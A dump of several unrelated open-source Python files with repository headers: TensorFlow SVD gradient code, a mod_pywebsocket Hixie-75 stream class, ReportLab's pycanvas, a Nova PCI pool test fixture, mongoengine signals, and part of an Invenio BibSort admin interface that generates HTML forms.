"svd gradient is not implemented for abs(m - n) > 1 "
"when full_matrices is True")
s_mat = array_ops.matrix_diag(s)
s2 = math_ops.square(s)
# NOTICE: Because of the term involving f, the gradient becomes
# infinite (or NaN in practice) when singular values are not unique.
# Mathematically this should not be surprising, since for (k-fold)
# degenerate singular values, the corresponding singular vectors are
# only defined up a (k-dimensional) subspace. In practice, this can
# lead to numerical instability when singular values are close but not
# exactly equal.
f = array_ops.matrix_set_diag(
math_ops.reciprocal(
array_ops.expand_dims(s2, -2) - array_ops.expand_dims(s2, -1)),
array_ops.zeros_like(s))
s_inv_mat = array_ops.matrix_diag(math_ops.reciprocal(s))
v1 = v[..., :, :m]
grad_v1 = grad_v[..., :, :m]
u_gu = math_ops.matmul(u, grad_u, adjoint_a=True)
v_gv = math_ops.matmul(v1, grad_v1, adjoint_a=True)
f_u = f * u_gu
f_v = f * v_gv
term1_nouv = (
grad_s_mat + math_ops.matmul(f_u + _linalg.adjoint(f_u), s_mat) +
math_ops.matmul(s_mat, f_v + _linalg.adjoint(f_v)))
term1 = math_ops.matmul(u, math_ops.matmul(term1_nouv, v1, adjoint_b=True))
if m == n:
grad_a_before_transpose = term1
else:
gv1t = array_ops.matrix_transpose(grad_v1)
gv1t_v1 = math_ops.matmul(gv1t, v1)
term2_nous = gv1t - math_ops.matmul(gv1t_v1, v1, adjoint_b=True)
if op.get_attr("full_matrices"):
v2 = v[..., :, m:n]
grad_v2 = grad_v[..., :, m:n]
v1t_gv2 = math_ops.matmul(v1, grad_v2, adjoint_a=True)
term2_nous -= math_ops.matmul(v1t_gv2, v2, adjoint_b=True)
u_s_inv = math_ops.matmul(u, s_inv_mat)
term2 = math_ops.matmul(u_s_inv, term2_nous)
grad_a_before_transpose = term1 + term2
if use_adjoint:
grad_a = array_ops.matrix_transpose(grad_a_before_transpose)
else:
grad_a = grad_a_before_transpose
grad_a.set_shape(a_shape)
return grad_a
|
espadrine/opera
|
refs/heads/master
|
chromium/src/third_party/WebKit/Tools/Scripts/webkitpy/thirdparty/mod_pywebsocket/_stream_hixie75.py
|
681
|
# Copyright 2011, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""This file provides a class for parsing/building frames of the WebSocket
protocol version HyBi 00 and Hixie 75.
Specification:
- HyBi 00 http://tools.ietf.org/html/draft-ietf-hybi-thewebsocketprotocol-00
- Hixie 75 http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-75
"""
from mod_pywebsocket import common
from mod_pywebsocket._stream_base import BadOperationException
from mod_pywebsocket._stream_base import ConnectionTerminatedException
from mod_pywebsocket._stream_base import InvalidFrameException
from mod_pywebsocket._stream_base import StreamBase
from mod_pywebsocket._stream_base import UnsupportedFrameException
from mod_pywebsocket import util
class StreamHixie75(StreamBase):
"""A class for parsing/building frames of the WebSocket protocol version
HyBi 00 and Hixie 75.
"""
def __init__(self, request, enable_closing_handshake=False):
"""Construct an instance.
Args:
request: mod_python request.
enable_closing_handshake: to let StreamHixie75 perform closing
handshake as specified in HyBi 00, set
this option to True.
"""
StreamBase.__init__(self, request)
self._logger = util.get_class_logger(self)
self._enable_closing_handshake = enable_closing_handshake
self._request.client_terminated = False
self._request.server_terminated = False
def send_message(self, message, end=True, binary=False):
"""Send message.
Args:
message: unicode string to send.
binary: not used in hixie75.
Raises:
BadOperationException: when called on a server-terminated
connection.
"""
if not end:
raise BadOperationException(
'StreamHixie75 doesn\'t support send_message with end=False')
if binary:
raise BadOperationException(
'StreamHixie75 doesn\'t support send_message with binary=True')
if self._request.server_terminated:
raise BadOperationException(
'Requested send_message after sending out a closing handshake')
self._write(''.join(['\x00', message.encode('utf-8'), '\xff']))
def _read_payload_length_hixie75(self):
"""Reads a length header in a Hixie75 version frame with length.
Raises:
ConnectionTerminatedException: when read returns empty string.
"""
length = 0
while True:
b_str = self._read(1)
b = ord(b_str)
length = length * 128 + (b & 0x7f)
if (b & 0x80) == 0:
break
return length
def receive_message(self):
"""Receive a WebSocket frame and return its payload an unicode string.
Returns:
payload unicode string in a WebSocket frame.
Raises:
ConnectionTerminatedException: when read returns empty
string.
BadOperationException: when called on a client-terminated
connection.
"""
if self._request.client_terminated:
raise BadOperationException(
'Requested receive_message after receiving a closing '
'handshake')
while True:
# Read 1 byte.
# mp_conn.read will block if no bytes are available.
# Timeout is controlled by TimeOut directive of Apache.
frame_type_str = self.receive_bytes(1)
frame_type = ord(frame_type_str)
if (frame_type & 0x80) == 0x80:
# The payload length is specified in the frame.
# Read and discard.
length = self._read_payload_length_hixie75()
if length > 0:
_ = self.receive_bytes(length)
# 5.3 3. 12. if /type/ is 0xFF and /length/ is 0, then set the
# /client terminated/ flag and abort these steps.
if not self._enable_closing_handshake:
continue
if frame_type == 0xFF and length == 0:
self._request.client_terminated = True
if self._request.server_terminated:
self._logger.debug(
'Received ack for server-initiated closing '
'handshake')
return None
self._logger.debug(
'Received client-initiated closing handshake')
self._send_closing_handshake()
self._logger.debug(
'Sent ack for client-initiated closing handshake')
return None
else:
# The payload is delimited with \xff.
bytes = self._read_until('\xff')
# The WebSocket protocol section 4.4 specifies that invalid
# characters must be replaced with U+fffd REPLACEMENT
# CHARACTER.
message = bytes.decode('utf-8', 'replace')
if frame_type == 0x00:
return message
# Discard data of other types.
def _send_closing_handshake(self):
if not self._enable_closing_handshake:
raise BadOperationException(
'Closing handshake is not supported in Hixie 75 protocol')
self._request.server_terminated = True
# 5.3 the server may decide to terminate the WebSocket connection by
# running through the following steps:
# 1. send a 0xFF byte and a 0x00 byte to the client to indicate the
# start of the closing handshake.
self._write('\xff\x00')
def close_connection(self, unused_code='', unused_reason=''):
"""Closes a WebSocket connection.
Raises:
ConnectionTerminatedException: when closing handshake was
not successfull.
"""
if self._request.server_terminated:
self._logger.debug(
'Requested close_connection but server is already terminated')
return
if not self._enable_closing_handshake:
self._request.server_terminated = True
self._logger.debug('Connection closed')
return
self._send_closing_handshake()
self._logger.debug('Sent server-initiated closing handshake')
# TODO(ukai): 2. wait until the /client terminated/ flag has been set,
# or until a server-defined timeout expires.
#
# For now, we expect receiving closing handshake right after sending
# out closing handshake, and if we couldn't receive non-handshake
# frame, we take it as ConnectionTerminatedException.
message = self.receive_message()
if message is not None:
raise ConnectionTerminatedException(
'Didn\'t receive valid ack for closing handshake')
# TODO: 3. close the WebSocket connection.
# note: mod_python Connection (mp_conn) doesn't have close method.
def send_ping(self, body):
raise BadOperationException(
'StreamHixie75 doesn\'t support send_ping')
# vi:sts=4 sw=4 et
|
alanjw/GreenOpenERP-Win-X86
|
refs/heads/7.0
|
python/Lib/site-packages/reportlab/pdfgen/pycanvas.py
|
3
|
# a Pythonesque Canvas v0.8
# Author : Jerome Alet - <alet@librelogiciel.com>
# License : ReportLab's license
#
# $Id: pycanvas.py 3777 2010-09-15 15:15:46Z rgbecker $
#
__doc__ = """A contributed Canvas class which can also output Python source code to "replay" operations later
pycanvas.Canvas class works exactly like canvas.Canvas, but you can
call str() on pycanvas.Canvas instances. Doing so will return the
Python source code equivalent to your own program, which would, when
run, produce the same PDF document as your original program.
Generated Python source code defines a doIt() function which accepts
a filename or file-like object as its first parameter, and an
optional boolean parameter named "regenerate".
The doIt() function will generate a PDF document and save it in the
file you specified in this argument. If the regenerate parameter is
set then it will also return an automatically generated equivalent
Python source code as a string of text, which you can run again to
produce the very same PDF document and the Python source code, which
you can run again... ad nauseam ! If the regenerate parameter is
unset or not used at all (it then defaults to being unset) then None
is returned and the doIt() function is much much faster, it is also
much faster than the original non-serialized program.
the tests/test_pdfgen_pycanvas.py program is the test suite
for pycanvas, you can do the following to run it :
First set verbose=1 in reportlab/rl_config.py
then from the command interpreter :
$ cd tests
$ python test_pdfgen_pycanvas.py >n1.py
this will produce both n1.py and test_pdfgen_pycanvas.pdf
then :
$ python n1.py n1.pdf >n2.py
$ python n2.py n2.pdf >n3.py
$ ...
n1.py, n2.py, n3.py and so on will be identical files.
they eventually may end being a bit different because of
rounding problems, mostly in the comments, but this
doesn't matter since the values really are the same
(e.g. 0 instead of 0.0, or .53 instead of 0.53)
n1.pdf, n2.pdf, n3.pdf and so on will be PDF files
similar to test_pdfgen_pycanvas.pdf.
Alternatively you can import n1.py (or n3.py, or n16384.py if you prefer)
in your own program, and then call its doIt function :
import n1
pythonsource = n1.doIt("myfile.pdf", regenerate=1)
Or if you don't need the python source code and want a faster result :
import n1
n1.doIt("myfile.pdf")
When the generated source code is run directly as an independant program,
then the equivalent python source code is printed to stdout, e.g. :
python n1.py
will print the python source code equivalent to n1.py
Why would you want to use such a beast ?
- To linearize (serialize?) a program : optimizing some complex
parts for example.
- To debug : reading the generated Python source code may help you or
the ReportLab team to diagnose problems. The generated code is now
clearly commented and shows nesting levels, page numbers, and so
on. You can use the generated script when asking for support : we
can see the results you obtain without needing your datas or complete
application.
- To create standalone scripts : say your program uses a high level
environment to generate its output (databases, RML, etc...), using
this class would give you an equivalent program but with complete
independance from the high level environment (e.g. if you don't
have Oracle).
- To contribute some nice looking PDF documents to the ReportLab website
without having to send a complete application you don't want to
distribute.
- ... Insert your own ideas here ...
- For fun because you can do it !
"""
import cStringIO
from reportlab.pdfgen import canvas
from reportlab.pdfgen import pathobject
from reportlab.pdfgen import textobject
PyHeader = '''#! /usr/bin/env python
#
# This code was entirely generated by ReportLab (http://www.reportlab.com)
#
import sys
from reportlab.pdfgen import pathobject
from reportlab.pdfgen import textobject
from reportlab.lib.colors import Color
def doIt(file, regenerate=0) :
"""Generates a PDF document, save it into file.
file : either a filename or a file-like object.
regenerate : if set then this function returns the Python source
code which when run will produce the same result.
if unset then this function returns None, and is
much faster.
"""
if regenerate :
from reportlab.pdfgen.pycanvas import Canvas
else :
from reportlab.pdfgen.canvas import Canvas
'''
PyFooter = '''
# if we want the equivalent Python source code, then send it back
if regenerate :
return str(c)
if __name__ == "__main__" :
if len(sys.argv) != 2 :
# second argument must be the name of the PDF file to create
sys.stderr.write("%s needs one and only one argument\\n" % sys.argv[0])
sys.exit(-1)
else :
# we've got a filename, we can proceed.
print doIt(sys.argv[1], regenerate=1)
sys.exit(0)'''
def buildargs(*args, **kwargs) :
"""Constructs a printable list of arguments suitable for use in source function calls."""
arguments = ""
for arg in args :
arguments = arguments + ("%s, " % repr(arg))
for (kw, val) in kwargs.items() :
arguments = arguments+ ("%s=%s, " % (kw, repr(val)))
if arguments[-2:] == ", " :
arguments = arguments[:-2]
return arguments
class PDFAction :
"""Base class to fake method calls or attributes on PDF objects (Canvas, PDFPathObject, PDFTextObject)."""
def __init__(self, parent, action) :
"""Saves a pointer to the parent object, and the method name."""
self._parent = parent
self._action = action
def __getattr__(self, name) :
"""Probably a method call on an attribute, returns the real one."""
return getattr(getattr(self._parent._object, self._action), name)
def __call__(self, *args, **kwargs) :
"""The fake method is called, print it then call the real one."""
if not self._parent._parent._in :
self._precomment()
self._parent._parent._PyWrite(" %s.%s(%s)" % (self._parent._name, self._action, buildargs(*args, **kwargs)))
self._postcomment()
self._parent._parent._in = self._parent._parent._in + 1
retcode = getattr(self._parent._object, self._action)(*args,**kwargs)
self._parent._parent._in = self._parent._parent._in - 1
return retcode
def __hash__(self) :
return hash(getattr(self._parent._object, self._action))
def __coerce__(self, other) :
"""Needed."""
return coerce(getattr(self._parent._object, self._action), other)
def _precomment(self) :
"""To be overriden."""
pass
def _postcomment(self) :
"""To be overriden."""
pass
class PDFObject :
"""Base class for PDF objects like PDFPathObject and PDFTextObject."""
_number = 0
def __init__(self, parent) :
"""Saves a pointer to the parent Canvas."""
self._parent = parent
self._initdone = 0
def __getattr__(self, name) :
"""The user's programs wants to call one of our methods or get an attribute, fake it."""
return PDFAction(self, name)
def __repr__(self) :
"""Returns the name used in the generated source code (e.g. 'p' or 't')."""
return self._name
def __call__(self, *args, **kwargs) :
"""Real object initialisation is made here, because now we've got the arguments."""
if not self._initdone :
self.__class__._number = self.__class__._number + 1
methodname = self._postinit(*args,**kwargs)
self._parent._PyWrite("\n # create PDF%sObject number %i\n %s = %s.%s(%s)" % (methodname[5:], self.__class__._number, self._name, self._parent._name, methodname, buildargs(*args,**kwargs)))
self._initdone = 1
return self
class Canvas :
"""Our fake Canvas class, which will intercept each and every method or attribute access."""
class TextObject(PDFObject) :
_name = "t"
def _postinit(self, *args, **kwargs) :
self._object = textobject.PDFTextObject(self._parent,*args,**kwargs)
return "beginText"
class PathObject(PDFObject) :
_name = "p"
def _postinit(self, *args, **kwargs) :
self._object = pathobject.PDFPathObject(*args, **kwargs)
return "beginPath"
class Action(PDFAction) :
"""Class called for every Canvas method call."""
def _precomment(self) :
"""Outputs comments before the method call."""
if self._action == "showPage" :
self._parent._PyWrite("\n # Ends page %i" % self._parent._pagenumber)
elif self._action == "saveState" :
state = {}
d = self._parent._object.__dict__
for name in self._parent._object.STATE_ATTRIBUTES:
state[name] = d[name]
self._parent._PyWrite("\n # Saves context level %i %s" % (self._parent._contextlevel, state))
self._parent._contextlevel = self._parent._contextlevel + 1
elif self._action == "restoreState" :
self._parent._contextlevel = self._parent._contextlevel - 1
self._parent._PyWrite("\n # Restores context level %i %s" % (self._parent._contextlevel, self._parent._object.state_stack[-1]))
elif self._action == "beginForm" :
self._parent._formnumber = self._parent._formnumber + 1
self._parent._PyWrite("\n # Begins form %i" % self._parent._formnumber)
elif self._action == "endForm" :
self._parent._PyWrite("\n # Ends form %i" % self._parent._formnumber)
elif self._action == "save" :
self._parent._PyWrite("\n # Saves the PDF document to disk")
def _postcomment(self) :
"""Outputs comments after the method call."""
if self._action == "showPage" :
self._parent._pagenumber = self._parent._pagenumber + 1
self._parent._PyWrite("\n # Begins page %i" % self._parent._pagenumber)
elif self._action in [ "endForm", "drawPath", "clipPath" ] :
self._parent._PyWrite("")
_name = "c"
def __init__(self, *args, **kwargs) :
"""Initialize and begins source code."""
self._parent = self # nice trick, isn't it ?
self._in = 0
self._contextlevel = 0
self._pagenumber = 1
self._formnumber = 0
self._footerpresent = 0
self._object = canvas.Canvas(*args,**kwargs)
self._enforceColorSpace = self._object._enforceColorSpace
self._pyfile = cStringIO.StringIO()
self._PyWrite(PyHeader)
try :
del kwargs["filename"]
except KeyError :
pass
self._PyWrite(" # create the PDF document\n %s = Canvas(file, %s)\n\n # Begins page 1" % (self._name, buildargs(*args[1:], **kwargs)))
def __nonzero__(self) :
"""This is needed by platypus' tables."""
return 1
def __str__(self) :
"""Returns the equivalent Python source code."""
if not self._footerpresent :
self._PyWrite(PyFooter)
self._footerpresent = 1
return self._pyfile.getvalue()
def __getattr__(self, name) :
"""Method or attribute access."""
if name == "beginPath" :
return self.PathObject(self)
elif name == "beginText" :
return self.TextObject(self)
else :
return self.Action(self, name)
def _PyWrite(self, pycode) :
"""Outputs the source code with a trailing newline."""
self._pyfile.write("%s\n" % pycode)
if __name__ == '__main__':
print 'For test scripts, look in tests'
|
Francis-Liu/animated-broccoli
|
refs/heads/master
|
nova/tests/unit/fake_pci_device_pools.py
|
83
|
# Copyright 2014 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.objects import pci_device_pool
# This represents the format that PCI device pool info was stored in the DB
# before this info was made into objects.
fake_pool_dict = {
'product_id': 'fake-product',
'vendor_id': 'fake-vendor',
'numa_node': 1,
't1': 'v1',
't2': 'v2',
'count': 2,
}
fake_pool = pci_device_pool.PciDevicePool(count=5,
product_id='foo',
vendor_id='bar',
numa_node=0,
tags={'t1': 'v1', 't2': 'v2'})
fake_pool_primitive = fake_pool.obj_to_primitive()
fake_pool_list = pci_device_pool.PciDevicePoolList(objects=[fake_pool])
fake_pool_list_primitive = fake_pool_list.obj_to_primitive()
|
Pablo126/SSBW
|
refs/heads/master
|
Entrega1/lib/python3.5/site-packages/mongoengine/signals.py
|
7
|
__all__ = ('pre_init', 'post_init', 'pre_save', 'pre_save_post_validation',
'post_save', 'pre_delete', 'post_delete')
signals_available = False
try:
from blinker import Namespace
signals_available = True
except ImportError:
class Namespace(object):
def signal(self, name, doc=None):
return _FakeSignal(name, doc)
class _FakeSignal(object):
"""If blinker is unavailable, create a fake class with the same
interface that allows sending of signals but will fail with an
error on anything else. Instead of doing anything on send, it
will just ignore the arguments and do nothing instead.
"""
def __init__(self, name, doc=None):
self.name = name
self.__doc__ = doc
def _fail(self, *args, **kwargs):
raise RuntimeError('signalling support is unavailable '
'because the blinker library is '
'not installed.')
send = lambda *a, **kw: None # noqa
connect = disconnect = has_receivers_for = receivers_for = \
temporarily_connected_to = _fail
del _fail
# the namespace for code signals. If you are not mongoengine code, do
# not put signals in here. Create your own namespace instead.
_signals = Namespace()
pre_init = _signals.signal('pre_init')
post_init = _signals.signal('post_init')
pre_save = _signals.signal('pre_save')
pre_save_post_validation = _signals.signal('pre_save_post_validation')
post_save = _signals.signal('post_save')
pre_delete = _signals.signal('pre_delete')
post_delete = _signals.signal('post_delete')
pre_bulk_insert = _signals.signal('pre_bulk_insert')
post_bulk_insert = _signals.signal('post_bulk_insert')
|
jmacmahon/invenio
|
refs/heads/elasticsearch_logging
|
modules/bibsort/lib/bibsortadminlib.py
|
3
|
# This file is part of Invenio.
# Copyright (C) 2011, 2012 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Invenio BibSort Administrator Interface."""
from invenio.access_control_engine import acc_authorize_action
from invenio.dbquery import run_sql
from invenio.config import CFG_SITE_URL, CFG_BIBSORT_BUCKETS, CFG_ETCDIR, CFG_SITE_LANG
from invenio.messages import gettext_set_language, language_list_long
from invenio.bibsort_engine import delete_all_data_for_method, add_sorting_method
from invenio.bibsort_washer import get_all_available_washers
from invenio.bibrankadminlib import write_outcome, modify_translations, \
get_i8n_name, get_languages, \
tupletotable, createhiddenform
def perform_index(ln, action, bsrcode, sm_name, sm_def_type, sm_def_value, sm_washer, sm_locale):
"""
Create the BibSort main page that displays all the sorting methods.
"""
_ = gettext_set_language(ln)
out = create_important_box('<p>If you have questions, please see the %s.</p>' \
%get_admin_guide_link(ln), '#66CCFF')
if not CFG_BIBSORT_BUCKETS:
return create_important_box('<p>BibSort is not configured. In order to enable it, \
CFG_BIBSORT_BUCKETS needs to have a positive value.<br\>\
Please see the %s for more details.</p>' %get_admin_guide_link(ln))
#Treatment of the possible actions
if action == 'delete':
result = delete_all_data_for_method(bsrcode)
if not result:
return create_important_box('<p> There was an error deleting method %s. <br/>\
You can try deleting methods directly in the config file: \
(<b>%s/bibsort/bibsort.cfg</b>) <br/>\
and then load the configuration into the database using the command line tool.<br/>\
Please see the %s for more details.</p>' \
%(bsrcode, CFG_ETCDIR, get_admin_guide_link(ln)))
elif action == 'add':
sm_method = '%s: %s' % (sm_def_type.upper(), sm_def_value)
if sm_locale != 'en':
#it's not the default one, let's store it in the db with the washer
sm_washer += ':%s' % sm_locale
result = add_sorting_method(sm_name, sm_method, sm_washer)
if not result:
return create_important_box('<p> There was an error adding method %s. <br/>\
You can try adding methods directly in the config file: \
(<b>%s/bibsort/bibsort.cfg</b>) \
and then load the configuration into the database using the command line tool.<br/>\
Please see the %s for more details.</p>' \
%(sm_name, CFG_ETCDIR, get_admin_guide_link(ln)))
sorting_methods = get_sorting_methods()
if not sorting_methods:
out = create_important_box('<p>The BibSort contains no methods.<br/>\
If you wish to load a previous configuration (ex: <b>%s/bibsort/bibsort.cfg</b>) \
please use the bibsort command line tool.<br/>\
Please see the %s for more details.</p>' \
%(CFG_ETCDIR, get_admin_guide_link(ln)))
else:
#display the sorting methods in a table
#header
header_list = ['Name', 'Definition', 'Washer', 'Translation', 'Action']
sm_table_header = ''
for item in header_list:
sm_table_header += '''<th class="adminheader">%s</th>''' % item
#body
sm_table_body = ''
for (sm_id, sm_name, sm_def, sm_washer) in sorting_methods:
trans_link = create_adminaction_link('modifytranslations', 'Modify', {'bsrID': sm_id, 'ln': ln})
delete_link = create_action_delete_link(sm_name, sm_id, bsrcode, ln)
sm_table_body += '''<tr>
<td class="admintdleft">%(name)s</td>
<td class="admintdleft">%(def)s</td>
<td class="admintdleft">%(washer)s</td>
<td class="admintdleft">%(trans)s</td>
<td class="admintdleft">%(action)s</td>
</tr>
'''% {'name': sm_name, 'def': sm_def, \
'washer': sm_washer, 'trans': trans_link, \
'action': delete_link}
#the sorting methods table
sm_table = '''
<table class="admin_wvar_nomargin">
<tr>%(header)s</tr>
%(body)s
</table>
''' % {'header': sm_table_header, 'body': sm_table_body}
out += sm_table
# add new bibsort method button
out += create_action_add_link()
return out
def create_action_add_link():
"""
Creates the Add action link and the Add new method form and java script attached to it.
"""
add_form_js = '''
<script>
$(document).ready(function(){
$('#addform').hide();
$('#addsortingmethod').click(function() {
$('#addform').slideDown()
});
});
</script>'''
button_style = '''color: #FFFFFF; background: #3366CC;
text-decoration:none; font-weight:bold;
font-size:small; padding:5px;'''
#get the available washers
def get_washer_value():
"""Returns all the available washer methods"""
sm_washer_code = '''<select name="sm_washer">'''
sm_washer_code += '''<option value='NOOP'>NOOP</option>'''
washers = get_all_available_washers()
for washer in washers:
sm_washer_code += '''<option value='%(washer)s'>%(washer)s</option>''' \
% {'washer': washer}
sm_washer_code += '''</select>'''
return sm_washer_code
#get possibilities for field
def get_field_value():
"""Returns all the available logical fields"""
field_value = '''<div><select id='fieldmore' name="sm_field_value">'''
fields = get_all_available_fields()
for field in fields:
field_value += '''<option value='%(field)s'>%(field)s</option>''' \
% {'field': field[0]}
field_value += '''</select></div>'''
return field_value
#get possibilities for marc
def get_marc_value():
"""Returns the input field for the MARC tag"""
return '''
<div>
<input type='text' id='marcmore' name='sm_marc_value' />
</div>'''
#get possibilities for rnk
def get_rnk_value():
"""Returns all the available rnk methods"""
rnk_value = '''<div><select id='rnkmore' name="sm_rnk_value">'''
rnks = get_all_available_rnks()
for rnk in rnks:
rnk_value += '''<option value='%(rnk)s'>%(rnk)s</option>''' \
% {'rnk': rnk[0]}
rnk_value += '''</select></div>'''
return rnk_value
#get possibilities for bibrec
def get_bibrec_value():
"""Returns all the available bibrec methods"""
return '''
<div>
<select id='bibrecmore' name="sm_bibrec_value">
<option value='creation_date'>creation date</option>
<option value='modification_date'>modification date</option>
</select>
</div>'''
#get possibilities for language
def get_locale_value():
"""Returns all the available languages"""
sm_locale_code = '''<select name="sm_locale">'''
sm_locale_code += '''<option value='en'>English (default)</option>'''
langs = language_list_long(True)
for lang in langs:
if lang[0] != 'en': # we already added English as default
sm_locale_code += '''<option value='%(lang_short)s'>%(lang_long)s</option>''' \
% {'lang_short': lang[0], 'lang_long': lang[1]}
sm_locale_code += '''</select>'''
return sm_locale_code
#get the possible definition types
sm_types = ['field', 'marc', 'rnk', 'bibrec']
sm_def_code = '''<table cellspan='5' cellpadding='5'>'''
for sm_type in sm_types:
sm_def_code += '''
<tr>
<td><input type="radio" name="sm_def_type" value="%(type)s" id="%(id)s">%(name)s</td>
<td id="%(type_id)s">%(type_value)s</td>
</tr>''' \
% {'type': sm_type,
'id': sm_type + 'radio',
'name': sm_type.upper(),
'type_id': 'type' + sm_type,
'type_value': locals()['get_' + sm_type + '_value']()}
#javascript code for: when one method is selected, show it's value and hide the values for the others
sm_def_code += '''<script>
$(document).ready(function(){
$('#%(type_id)s').hide();
$('#%(id)s').click(function() {
$('#%(type_id)s').show();
all_types = $.map($('input:radio[name=sm_def_type]'), function(el){return el.value;})
for (sm_type in all_types){
if ('type' + all_types[sm_type] != '%(type_id)s'){
$('#type' + all_types[sm_type]).hide();
}
}
});
});
</script>''' \
% {'id': sm_type + 'radio',
'type_id': 'type' + sm_type}
sm_def_code += '''</table>'''
#javascript for: populate field sm_def_value and delete all the sm_[type]_value
add_form = '''<script>
$(document).ready(function(){
$('#addsubmission').submit(function(){
selected_type = $('input:radio[name=sm_def_type]:checked').val();
selected_value = $('[name=sm_' + selected_type + '_value]').val();
$('[name=sm_def_value]').val(selected_value);
all_types = $.map($('input:radio[name=sm_def_type]'), function(el){return el.value;})
for (type in all_types){
$('#' + all_types[type] + 'more').remove();
}
});
});
</script>'''
add_form += '''
<div id='addform' style='border: 1px solid #FF9966; padding:10px; margin-top:20px; margin-left:10px; width:-moz-fit-content;'>
<form action='bibsortadmin.py' id='addsubmission'>
<input type='hidden' name='action' value='add'/>
<input type='hidden' name='sm_def_value' value=''/>
<table cellspacing="5" style='text-size:small;'>
<tr>
<td><b><small>Method Name:</small></b></td>
<td><input type='text' name='sm_name'/></td>
</tr>
<tr>
<td valign="top"><b><small>Method Definition:</small></b></td>
<td>%(sm_def_code)s</td>
</tr>
<tr>
<td><b><small>Method Washer:</small></b></td>
<td>%(sm_washer_code)s</td>
</tr>
<tr>
<td><b><small>Use this language when sorting:</small></b></td>
<td>%(sm_locale_code)s</td>
</tr>
<tr>
<td colspan=2 align='right'><input type='submit' value='Add' style="%(button_style)s"/></td>
</tr>
</table>
</form>
</div>
'''% {'button_style': button_style,
'sm_washer_code': get_washer_value(),
'sm_locale_code': get_locale_value(),
'sm_def_code': sm_def_code}
button_link = '''<div style="padding-top:20px; padding-left:10px;">\
<a href='#' style='%s' id='addsortingmethod'>Add New Sorting Method</a>\
</div>''' % button_style
return button_link + add_form_js + add_form
def create_action_delete_link(sm_name, sm_id, bsrcode, ln):
"""
Creates the Delete action link.
"""
if sm_id == bsrcode:
# the deletion was not successful, the method that should have been deleted is still in the database
return '<span style="color:red">Error: the method was not deleted. Please check the database permissions.</span>'
delete_confirm = '''Are you sure you want to delete the sorting method <<%s>> and all the data asociated with it? [If in doubt, see the BibSort Admin Guide for details].''' % sm_name
on_click = '''return confirm('%s')''' % delete_confirm
return create_adminaction_link('', 'Delete', options={'bsrID': sm_id, 'ln': ln, 'action': 'delete'}, style='', on_click=on_click)
def getnavtrail(previous = ''):
"""Get the navtrail"""
navtrail = """<a class="navtrail" href="%s/help/admin">Admin Area</a> """ % (CFG_SITE_URL,)
navtrail = navtrail + previous
return navtrail
def check_user(req, role, authorized=0):
"""
Checks if the user is authorized to access the admin area.
"""
auth_code, auth_message = acc_authorize_action(req, role)
if not authorized and auth_code != 0:
return ("false", auth_message)
return ("", auth_message)
def get_sorting_name(bsrcode):
"""
Returns the name asociated with the bsrcode in the bsrMETHOD table.
"""
try:
return run_sql('SELECT name from bsrMETHOD where id = %s', (bsrcode,))[0][0]
except IndexError:
return ''
def get_sorting_methods():
"""
Returns the list of all sorting methods defined
"""
return run_sql('SELECT id, name, definition, washer from bsrMETHOD')
def create_important_box(content, color='#FF9966'):
"""
Returns the code for a red box containing an important message
"""
return '''<div style="border:1px solid %(color)s; background: %(color)s; width=100%%; margin-bottom:10px;">
<center><i>%(content)s</i></center>
</div>''' % {'color': color, 'content': content}
def create_adminaction_link(action, name, options=None, style='', on_click=''):
"""
Returns the link coresponding to an action
@param action: the action the url should point to
@param name: the name displayed to the user
@param options: dictionary containing the url parameters
"""
#create the link parameters from the options dictionarly
link_params = options and '&'.join('%s=%s' %(item, options[item]) for item in options) or ''
return '<a style="%(style)s" onclick="%(on_click)s" \
href="%(site)s/admin/bibsort/bibsortadmin.py/%(action)s?%(link_params)s">%(name)s</a>' \
% {'style': style,
'on_click': on_click,
'site': CFG_SITE_URL,
'action':action,
'link_params':link_params,
'name':name}
def get_admin_guide_link(ln):
"""
Returns the link to the admin guide.
"""
_ = gettext_set_language(ln)
return '<a href="%s/help/admin/bibsort-admin-guide">%s</a>' % (CFG_SITE_URL, _('BibSort Guide'))
def get_all_available_fields():
"""
Returns all fields
"""
return run_sql("SELECT code FROM field ORDER BY code")
def get_all_available_rnks():
"""
Returns all ranking methods
"""
